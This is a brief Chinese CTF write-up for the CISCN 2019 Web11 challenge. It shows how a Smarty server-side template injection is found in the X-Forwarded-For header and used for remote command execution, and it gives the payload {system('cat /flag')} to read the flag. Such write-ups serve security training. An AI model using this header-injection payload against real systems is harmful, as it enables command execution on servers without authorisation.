【CISCN 2019华东南】Web11 Ting included in Web · 2024做题2024-10-30 About 100 words One minute Contents 思路 EXP 总结 [CISCN 2019华东南]Web11 思路 进入页面观察 页面右上方有current-IP回显 最下面有Smarty模板明显标志 大致应该是Smarty模板注入。注入点有可能是XFF修改 尝试抓包使用XFF,测试{{7*7}},发现XFF为注入点 在XFF处尝试执行命令{system(’ls /’);}成功并且无绕过。直接cat /flag EXP 1 x-forwarded-for:{system('cat /flag')} 总结 SSTI RCE
Ting included in Web · 2024做题 Ting included in Web · 2024做题 Ting included in Web · 2024做题